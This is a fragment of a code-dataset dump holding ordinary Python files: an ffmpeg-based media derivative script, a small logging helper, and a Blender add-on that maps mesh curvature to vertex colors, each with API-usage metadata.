{"api_name": "django.db.models.BooleanField", "line_number": 141, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 141, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 150, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 150, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.db.models.JSONField", "line_number": 151, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 151, "usage_type": "name"}, {"api_name": "django.db.models.JSONField", "line_number": 153, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 153, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 155, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 155, "usage_type": "name"}, {"api_name": "share.models.fields.EncryptedJSONField", "line_number": 157, "usage_type": "call"}, {"api_name": "share.models.fields.EncryptedJSONField", "line_number": 158, "usage_type": "call"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.connections", "line_number": 188, "usage_type": "name"}, {"api_name": "share.harvest.exceptions.HarvesterConcurrencyError", "line_number": 193, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 182, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 211, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 211, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 212, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 212, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 213, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 213, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 214, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 214, "usage_type": "name"}, {"api_name": "share.util.extensions.Extensions.get", "line_number": 226, "usage_type": "call"}, {"api_name": "share.util.extensions.Extensions", "line_number": 226, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 235, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 235, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 236, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 236, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 237, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 237, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 238, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 238, "usage_type": "name"}, {"api_name": "share.util.extensions.Extensions.get", "line_number": 250, "usage_type": "call"}, {"api_name": "share.util.extensions.Extensions", "line_number": 250, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 259, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 259, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 260, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 260, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 261, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 261, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 261, "usage_type": "attribute"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 263, "usage_type": "name"}, {"api_name": "django.db.models.functions.Coalesce", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models.functions.Coalesce", "line_number": 283, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 286, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 286, "usage_type": "attribute"}, {"api_name": "share.models.fuzzycount.FuzzyCountManager", "line_number": 302, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 308, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 308, "usage_type": "name"}, {"api_name": "share.util.chunked", "line_number": 309, "usage_type": "call"}, {"api_name": "django.db.DEFAULT_DB_ALIAS", "line_number": 326, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 341, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 341, "usage_type": "name"}, {"api_name": "share.util.chunked", "line_number": 346, "usage_type": "call"}, {"api_name": "share.util.placeholders", "line_number": 384, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 437, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 437, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 438, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 438, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 438, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 439, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 439, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 439, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 445, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 445, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 447, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 447, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 449, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 449, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 449, "usage_type": "attribute"}, {"api_name": "django.db.models.TextField", "line_number": 452, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 452, "usage_type": "name"}, {"api_name": "django.core.validators.MaxLengthValidator", "line_number": 452, "usage_type": "call"}, {"api_name": "django.core.validators", "line_number": 452, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 454, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 454, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 460, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 460, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 461, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 461, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 463, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 463, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 470, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 470, "usage_type": "name"}, {"api_name": "django.db.models.Index", "line_number": 482, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 482, "usage_type": "name"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 485, "usage_type": "name"}]} +{"seq_id": "351044240", "text": "#!/usr/bin/env python3\n# YOU WANT TO MAKE SOME DERIVATIVES, PUNK?\nimport argparse\nimport json\nimport os\nimport re\nimport subprocess\nimport sys\n# local modules:\nimport moveNcopy\nimport pymmFunctions\nimport sequenceScanner\n\nconfig = pymmFunctions.read_config()\n\ndefaultVideoAccessOptions = [\n\t\"-movflags\",\"faststart\",\n\t\"-pix_fmt\",\"yuv420p\",\n\t\"-c:v\",\"libx264\",\n\t\"-bufsize\",\"1835k\",\n\t\"-f\",\"mp4\",\n\t\"-crf\",\"23\",\n\t\"-maxrate\",\"8760k\",\n\t\"-c:a\",\"aac\",\n\t\"-ac\",\"2\",\n\t\"-b:a\",\"320k\",\n\t\"-ar\",\"48000\"\n\t]\n\ndefaultAudioAccessOptions = [\n\t\"-id3v2_version\",\"3\",\n\t\"-dither_method\",\"rectangular\",\n\t\"-qscale:a\",\"1\"\n\t]\n\n# SET FFMPEG INPUT OPTIONS\ndef set_input_options(derivType,inputPath,ffmpegLogDir=None,isSequence=None):\n\tif isSequence:\n\t\t# get variables needed to process a derivative from a dpx sequence\n\t\taudioPath,filePattern,startNumber,framerate = pymmFunctions.parse_sequence_parent(inputPath)\n\t\t# print(audioPath)\n\t\tinputOptions = [\n\t\t\t'-start_number',startNumber,\n\t\t\t'-i',filePattern\n\t\t\t]\n\t\tif framerate:\n\t\t\tinputOptions.extend(['-r',framerate])\n\t\tif audioPath:\n\t\t\tinputOptions.extend(\n\t\t\t\t['-i',audioPath]\n\t\t\t\t)\n\telse:\n\t\taudioPath = None\n\t\tinputOptions = ['-i',inputPath]\n\n\tif ffmpegLogDir:\n\t\tinputOptions.append('-report')\n\t\n\treturn inputOptions,audioPath\n\ndef set_middle_options(derivType,inputType):\n\t'''\n\tSET FFMPEG MIDDLE OPTIONS\n\t'''\n\tmiddleOptions = []\n\tif derivType == 'resourcespace':\n\t\t# make an mp4 file for upload to ResourceSpace\n\t\t# also used as our Proxy for access screenings\n\t\t# list in config setting requires double quotes\n\t\tif inputType in ('VIDEO','sequence'):\n\t\t\tmiddleOptions = json.loads(config['ffmpeg']['resourcespace_video_opts'])\n\t\telif inputType == 'AUDIO':\n\t\t\tmiddleOptions = json.loads(config['ffmpeg']['resourcespace_audio_opts'])\n\n\t\t# test/set a default proxy command for FFMPEG call\n\t\tif middleOptions == ['a','b','c']:\n\t\t\tif inputType == 'VIDEO':\n\t\t\t\tmiddleOptions = defaultVideoAccessOptions\n\t\t\telif inputType == 'AUDIO':\n\t\t\t\tmiddleOptions = defaultAudioAccessOptions\n\t\t\tprint(\n\t\t\t\t\"WARNING: YOU HAVEN'T SET FFMPEG \"\n\t\t\t\t\"OPTIONS FOR ACCESS FILE TRANSCODING \"\n\t\t\t\t\"IN config.ini.\\nWE'RE GOING TO USE SOME DEFAULTS!!\"\n\t\t\t\t)\n\n\telif derivType == 'proresHQ':\n\t\t# make a HQ prores .mov file as a mezzanine \n\t\t# for color correction, cropping, etc.\n\t\tmiddleOptions = json.loads(config['ffmpeg']['proresHQ_opts'])\n\t\n\telif True == True:\n\t\tprint('etc')\n\t\t# and so on\n\n\treturn middleOptions\n\ndef set_output_options(derivType,inputType,inputPath,outputDir):\n\toutputOptions = []\n\t# the ffmpeg docs say the strict flag is no longer required \n\t# for aac encoding in mp4 but I ran into issues without it, \n\t# so I'll keep it for now (7/2018)\n\tstrict = ['-strict','-2'] \n\tbase = pymmFunctions.get_base(inputPath)\n\tbaseMinusExtension = pymmFunctions.get_base(\n\t\tinputPath,\n\t\t'baseMinusExtension'\n\t\t)\n\t# make a delivery directory for a package that is based on the deriv type\n\tderivDeliv = os.path.join(outputDir,derivType)\n\tif not os.path.isdir(derivDeliv):\n\t\tprint(\"Making a directory at \"+derivDeliv)\n\t\ttry:\n\t\t\tos.mkdir(os.path.join(outputDir,derivType))\n\t\texcept:\n\t\t\tprint(\"couldn't make a dir at \"+derivDeliv)\n\tif derivType == 'resourcespace':\n\t\tif inputType in ('VIDEO','sequence'):\n\t\t\text = 'mp4'\n\t\t\toutputOptions.extend(strict)\n\t\telif inputType == 'AUDIO':\n\t\t\text = 'mp3'\n\t\telse:\n\t\t\text = 'mp4'\n\t\t\tprint(\"FUCK EVERYTHING: ERROR GETTING THE FILE TYPE.\")\n\t\toutputFilePath = os.path.join(\n\t\t\tderivDeliv,\n\t\t\tbaseMinusExtension+'_lrp.'+ext\n\t\t\t)\n\t\toutputOptions.append(outputFilePath)\n\telif derivType == 'proresHQ':\n\t\text = 'mov'\n\t\toutputFilePath = os.path.join(\n\t\t\tderivDeliv,\n\t\t\tbaseMinusExtension+'_proresHQ.'+ext\n\t\t\t)\n\t\toutputOptions.append(outputFilePath)\n\telse:\n\t\tprint('~ ~ ~ ~ ~')\n\t\t# DO STUFF TO OTHER DERIV TYPES\n\treturn outputOptions\n\ndef set_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription='make derivatives of an input a/v file or an image sequence'\n\t\t)\n\tparser.add_argument(\n\t\t'-i','--inputPath',\n\t\trequired=True,\n\t\thelp='path of input material'\n\t\t)\n\tparser.add_argument(\n\t\t'-d','--derivType',\n\t\tchoices=['resourcespace','proresHQ'],\n\t\tdefault='resourcespace',\n\t\thelp='choose a derivative type to output'\n\t\t)\n\tparser.add_argument(\n\t\t'-o','--outputDir',\n\t\thelp='set output directory for deriv delivery'\n\t\t)\n\tparser.add_argument(\n\t\t'-L','--logDir',\n\t\thelp='set output directory for ffmpeg and rsync logs'\n\t\t)\n\tparser.add_argument(\n\t\t'-r','--rspaceMulti',\n\t\thelp='set directory for multi-part resourcespace object'\n\t\t)\n\tparser.add_argument(\n\t\t'-s','--isSequence',\n\t\taction='store_true',\n\t\thelp='flag if the input is an image sequence'\n\t\t)\n\n\treturn parser.parse_args()\n\ndef additional_delivery(derivFilepath,derivType,rsMulti=None):\n\tdestinations = \t{\n\t\t'resourcespace': config['paths']['resourcespace_deliver'],\n\t\t'proresHQ':config['paths']['prores_deliver']\n\t\t}\n\tdeliveryDir = destinations[derivType]\n\n\tif deliveryDir == '':\n\t\tprint(\n\t\t\t\"there's no directory set \"\n\t\t\t\"for {} delivery... SET IT!!\".format(derivType)\n\t\t\t)\n\t\tpass\n\telif deliveryDir != '' and rsMulti != None:\n\t\tsys.argv = ['',\n\t\t\t'-i'+derivFilepath,\n\t\t\t'-d'+rsMulti\n\t\t\t]\n\telse:\n\t\tsys.argv = ['',\n\t\t\t'-i'+derivFilepath,\n\t\t\t'-d'+deliveryDir\n\t\t\t]\n\t\n\ttry:\n\t\tmoveNcopy.main()\n\texcept:\n\t\tprint(\n\t\t\t'there was an error in rsyncing the output '\n\t\t\t'deriv to the destination folder'\n\t\t\t)\n\ndef main():\n\t# DO STUFF\n\targs = set_args()\n\tinputPath = args.inputPath\n\t# for ingestfile.py this is the packageDerivDir\n\toutputDir = args.outputDir\n\tderivType = args.derivType\n\tlogDir = args.logDir\n\trsMulti = args.rspaceMulti\n\tisSequence = args.isSequence\n\n\tif logDir:\n\t\tpymmFunctions.set_ffreport(logDir,'makeDerivs')\n\n\tif not isSequence:\n\t\tinputType = pymmFunctions.is_av(inputPath)\n\telse:\n\t\tinputType = 'sequence'\n\tffmpegArgs = []\n\tinputOptions,audioPath = set_input_options(\n\t\tderivType,\n\t\tinputPath,\n\t\tlogDir,\n\t\tisSequence\n\t\t)\n\tmiddleOptions = set_middle_options(derivType,inputType)\n\toutputOptions = set_output_options(\n\t\tderivType,\n\t\tinputType,\n\t\tinputPath,\n\t\toutputDir\n\t\t)\n\t\n\tffmpegArgs = inputOptions+middleOptions+outputOptions\n\tffmpegArgs.insert(0,'ffmpeg')\n\tprint(' '.join(ffmpegArgs))\n\toutput = subprocess.Popen(\n\t\tffmpegArgs,\n\t\tstdout=subprocess.PIPE,\n\t\tstderr=subprocess.PIPE\n\t\t)\n\tout,err = output.communicate()\n\t# print(out.decode('utf-8'))\n\t\n\tif err:\n\t\tprint(err.decode('utf-8'))\n\tif logDir:\n\t\tpymmFunctions.unset_ffreport()\n\t\n\t# get the output path to rsync the deriv to access directories\n\toutputFilePath = outputOptions[-1]\n\tif pymmFunctions.boolean_answer(\n\t\tconfig['deriv delivery options'][derivType]\n\t\t):\n\t\tadditional_delivery(outputFilePath,derivType,rsMulti)\n\t# print(outputFilePath)\n\treturn outputFilePath\n\nif __name__ == '__main__':\n\tmain()\n", "sub_path": "makeDerivs.py", "file_name": "makeDerivs.py", "file_ext": "py", "file_size_in_byte": 6644, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymmFunctions.read_config", "line_number": 14, "usage_type": "call"}, {"api_name": "pymmFunctions.parse_sequence_parent", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "pymmFunctions.get_base", "line_number": 104, "usage_type": "call"}, {"api_name": "pymmFunctions.get_base", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 192, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 197, "usage_type": "attribute"}, {"api_name": "moveNcopy.main", "line_number": 203, "usage_type": "call"}, {"api_name": "pymmFunctions.set_ffreport", "line_number": 222, "usage_type": "call"}, {"api_name": "pymmFunctions.is_av", "line_number": 225, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 246, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 249, "usage_type": "attribute"}, {"api_name": "pymmFunctions.unset_ffreport", "line_number": 257, "usage_type": "call"}, {"api_name": "pymmFunctions.boolean_answer", "line_number": 261, "usage_type": "call"}]} +{"seq_id": "311160766", "text": "\"\"\"\n@Project : decaNLP\n@Module : logger_setup.py\n@Author : Deco [deco@cubee.com]\n@Created : 8/3/18 11:42 AM\n@Desc : 配置logger\n\"\"\"\nimport logging\n\n\ndef define_logger(rank='default'):\n logger = logging.getLogger(f'process_{rank}')\n # https://stackoverflow.com/questions/6729268/log-messages-appearing-twice-with-python-logging\n if not logger.handlers:\n logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(name)s - %(lineno)d - %(message)s')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n logger.propagate = False\n return logger\n\n\ndef get_logger(rank='default'):\n logger = logging.getLogger(f'process_{rank}')\n return logger\n", "sub_path": "work5/logger_setup.py", "file_name": "logger_setup.py", "file_ext": "py", "file_size_in_byte": 803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "539519520", "text": "# -*- coding: utf-8 -*-\n\n# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nbl_info = {\n \"name\": \"Curvature to vertex colors\",\n \"category\": \"Object\",\n \"description\": \"Set object vertex colors according to mesh curvature\",\n \"author\": \"Tommi Hyppänen (ambi)\",\n \"location\": \"3D View > Object menu > Curvature to vertex colors\",\n \"version\": (0, 1, 7),\n \"blender\": (2, 79, 0)\n}\n\nimport bpy\nimport random\nfrom collections import defaultdict\nimport mathutils\nimport math\nimport numpy as np\nimport cProfile, pstats, io\n\n\ndef read_verts(mesh):\n mverts_co = np.zeros((len(mesh.vertices)*3), dtype=np.float)\n mesh.vertices.foreach_get(\"co\", mverts_co)\n return np.reshape(mverts_co, (len(mesh.vertices), 3)) \n\n\ndef read_edges(mesh):\n fastedges = np.zeros((len(mesh.edges)*2), dtype=np.int) # [0.0, 0.0] * len(mesh.edges)\n mesh.edges.foreach_get(\"vertices\", fastedges)\n return np.reshape(fastedges, (len(mesh.edges), 2))\n\n\ndef read_norms(mesh):\n mverts_no = np.zeros((len(mesh.vertices)*3), dtype=np.float)\n mesh.vertices.foreach_get(\"normal\", mverts_no)\n return np.reshape(mverts_no, (len(mesh.vertices), 3))\n\n\ndef safe_bincount(data, weights, dts, conn):\n bc = np.bincount(data, weights)\n dts[:len(bc)] += bc\n bc = np.bincount(data)\n conn[:len(bc)] += bc\n return (dts, conn)\n\n\nclass CurvatureOperator(bpy.types.Operator):\n \"\"\"Curvature to vertex colors\"\"\"\n bl_idname = \"object.vertex_colors_curve\"\n bl_label = \"Curvature to vertex colors\"\n bl_options = {'REGISTER', 'UNDO'}\n\n typesel = bpy.props.EnumProperty(\n items=[\n (\"RED\", \"Red/Green\", \"\", 1),\n (\"GREY\", \"Grayscale\", \"\", 2),\n (\"GREYC\", \"Grayscale combined\", \"\", 3),\n ],\n name=\"Output style\",\n default=\"RED\")\n \n concavity = bpy.props.BoolProperty(\n name=\"Concavity\",\n default=True,\n options={'HIDDEN'})\n convexity = bpy.props.BoolProperty(\n name=\"Convexity\",\n default=True,\n options={'HIDDEN'})\n \n def curveUpdate(self, context):\n if self.curvesel == \"CAVITY\":\n self.concavity = True\n self.convexity = False\n if self.curvesel == \"VEXITY\":\n self.concavity = False\n self.convexity = True\n if self.curvesel == \"BOTH\":\n self.concavity = True\n self.convexity = True\n \n curvesel = bpy.props.EnumProperty(\n items=[\n (\"CAVITY\", \"Concave\", \"\", 1),\n (\"VEXITY\", \"Convex\", \"\", 2),\n (\"BOTH\", \"Both\", \"\", 3),\n ],\n name=\"Curvature type\",\n default=\"BOTH\",\n update=curveUpdate)\n \n intensity_multiplier = bpy.props.FloatProperty(\n name=\"Intensity Multiplier\",\n min=0.0,\n default=1.0)\n \n smooth = bpy.props.IntProperty(\n name=\"Smoothing steps\",\n min=0,\n max=200,\n default=2)\n\n invert = bpy.props.BoolProperty(\n name=\"Invert\",\n default=False)\n\n @classmethod\n def poll(cls, context):\n ob = context.active_object\n return ob is not None and ob.mode == 'OBJECT'\n\n def set_colors(self, mesh, fvals):\n # Use 'curvature' vertex color entry for results\n if \"Curvature\" not in mesh.vertex_colors:\n mesh.vertex_colors.new(name=\"Curvature\")\n \n color_layer = mesh.vertex_colors['Curvature']\n mesh.vertex_colors[\"Curvature\"].active = True\n\n retvalues = []\n \n if self.typesel == \"GREY\":\n splitter = fvals>0.5\n a_part = splitter * (fvals*2-1)*self.concavity\n b_part = np.logical_not(splitter) * (1-fvals*2)*self.convexity\n fvals = a_part + b_part\n fvals *= self.intensity_multiplier\n if self.invert:\n fvals = 1.0 - fvals\n \n retvalues = np.ones((len(fvals), 4))\n retvalues[:,0] = fvals\n retvalues[:,1] = fvals\n retvalues[:,2] = fvals\n \n if self.typesel == \"GREYC\":\n if not self.convexity:\n fvals = np.where(fvals<0.5, 0.5, fvals)\n if not self.concavity:\n fvals = np.where(fvals>0.5, 0.5, fvals)\n if not self.invert:\n fvals = 1.0 - fvals\n fvals = (fvals-0.5)*self.intensity_multiplier+0.5\n retvalues = np.ones((len(fvals), 4))\n retvalues[:,0] = fvals\n retvalues[:,1] = fvals\n retvalues[:,2] = fvals\n \n if self.typesel == \"RED\":\n splitter = fvals>0.5\n a_part = splitter * (fvals*2-1)*self.concavity\n b_part = np.logical_not(splitter) * (1-fvals*2)*self.convexity\n retvalues = np.ones((len(fvals), 4))\n if self.invert:\n retvalues[:,0] = 1.0 - a_part * self.intensity_multiplier\n retvalues[:,1] = 1.0 - b_part * self.intensity_multiplier\n else:\n retvalues[:,0] = a_part * self.intensity_multiplier\n retvalues[:,1] = b_part * self.intensity_multiplier \n retvalues[:,2] = np.zeros((len(fvals)))\n\n # write vertex colors\n mloops = np.zeros((len(mesh.loops)), dtype=np.int)\n mesh.loops.foreach_get(\"vertex_index\", mloops)\n color_layer.data.foreach_set(\"color\", retvalues[mloops].flatten())\n \n return None\n\n\n def calc_normals(self, mesh, fastverts, fastnorms, fastedges):\n # FIXME: FAILS AT INVALID INPUT MESH\n # If there are any loose or disconnected vertices or edges, the output will be black\n # HOWTO cleanup:\n # 1. Remove doubles\n # 2. Delete loose\n\n edge_a, edge_b = fastedges[:,0], fastedges[:,1]\n \n tvec = fastverts[edge_b] - fastverts[edge_a]\n tvlen = np.linalg.norm(tvec, axis=1) \n\n tvec = (tvec.T / tvlen).T # normalize vectors\n\n # adjust the minimum of what is processed \n edgelength = tvlen * 100 \n edgelength = np.where(edgelength<1, 1.0, edgelength)\n\n vecsums = np.zeros(fastverts.shape[0], dtype=np.float) \n connections = np.zeros(fastverts.shape[0], dtype=np.float) \n\n # calculate normal differences to the edge vector in the first edge vertex\n totdot = (np.einsum('ij,ij->i', tvec, fastnorms[edge_a]))/edgelength\n #for i, v in enumerate(edge_a):\n # vecsums[v] += totdot[i]\n # connections[v] += 1\n safe_bincount(edge_a, totdot, vecsums, connections)\n\n # calculate normal differences to the edge vector in the second edge vertex\n totdot = (np.einsum('ij,ij->i', -tvec, fastnorms[edge_b]))/edgelength\n safe_bincount(edge_b, totdot, vecsums, connections)\n\n # (approximate gaussian) curvature is the average difference of \n # edge vectors to surface normals (from dot procuct cosine equation)\n curve = 1.0 - np.arccos(vecsums/connections)/np.pi\n\n # 1 = max curvature, 0 = min curvature, 0.5 = zero curvature\n curve -= 0.5\n curve /= np.max([np.amax(curve), np.abs(np.amin(curve))])\n curve += 0.5\n return curve\n \n def mesh_smooth_filter_variable(self, mesh, data, fastverts, fastedges):\n # vert indices of edges\n edge_a, edge_b = fastedges[:,0], fastedges[:,1]\n tvlen = np.linalg.norm(fastverts[edge_b] - fastverts[edge_a], axis=1)\n edgelength = np.where(tvlen<1, 1.0, tvlen)\n\n data_sums = np.zeros(fastverts.shape[0], dtype=np.float) \n connections = np.zeros(fastverts.shape[0], dtype=np.float) \n\n # longer the edge distance to datapoint, less it has influence\n\n # step 1\n per_vert = data[edge_b]/edgelength\n safe_bincount(edge_a, per_vert, data_sums, connections)\n eb_smooth = data_sums/connections\n \n per_vert = eb_smooth[edge_a]/edgelength\n safe_bincount(edge_b, per_vert, data_sums, connections)\n\n new_data = data_sums/connections\n\n # step 2\n data_sums = np.zeros(data_sums.shape)\n connections = np.zeros(connections.shape)\n\n per_vert = data[edge_a]/edgelength\n safe_bincount(edge_b, per_vert, data_sums, connections)\n ea_smooth = data_sums/connections\n \n per_vert = ea_smooth[edge_b]/edgelength\n safe_bincount(edge_a, per_vert, data_sums, connections)\n\n new_data += data_sums/connections\n\n # limit between -1 and 1\n new_data /= np.max([np.amax(new_data), np.abs(np.amin(new_data))])\n\n return new_data\n\n\n def execute(self, context): \n mesh = context.active_object.data\n fastverts = read_verts(mesh)\n fastedges = read_edges(mesh)\n fastnorms = read_norms(mesh) \n\n angvalues = self.calc_normals(mesh, fastverts, fastnorms, fastedges)\n if self.smooth > 0:\n angvalues -= 0.5\n angvalues *= 2.0\n for _ in range(self.smooth):\n angvalues = self.mesh_smooth_filter_variable(mesh, angvalues, fastverts, fastedges)\n angvalues /= 2.0\n angvalues += 0.5\n \n self.set_colors(mesh, angvalues) \n \n return {'FINISHED'}\n\ndef add_object_button(self, context): \n self.layout.operator( \n CurvatureOperator.bl_idname, \n text=CurvatureOperator.__doc__, \n icon='MESH_DATA') \n\ndef register():\n bpy.utils.register_class(CurvatureOperator)\n bpy.types.VIEW3D_MT_object.append(add_object_button) \n\ndef unregister():\n bpy.utils.unregister_class(CurvatureOperator)\n bpy.types.VIEW3D_MT_object.remove(add_object_button)\n\ndef profile_debug():\n pr = cProfile.Profile()\n pr.enable()\n bpy.ops.object.vertex_colors_curve()\n pr.disable()\n s = io.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(pr, stream=s)\n ps.strip_dirs().sort_stats(sortby).print_stats()\n print(s.getvalue())\n\nif __name__ == \"__main__\":\n #unregister()\n register()\n #profile_debug()\n\n", "sub_path": "mesh_curves.py", "file_name": "mesh_curves.py", "file_ext": "py", "file_size_in_byte": 10846, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 61, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 66, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 72, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 72, "usage_type": "attribute"}, {"api_name": "bpy.props.BoolProperty", "line_number": 81, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 81, "usage_type": "attribute"}, {"api_name": "bpy.props.BoolProperty", "line_number": 85, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 85, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 101, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 101, "usage_type": "attribute"}, {"api_name": "bpy.props.FloatProperty", "line_number": 111, "usage_type": "call"}, {"api_name": 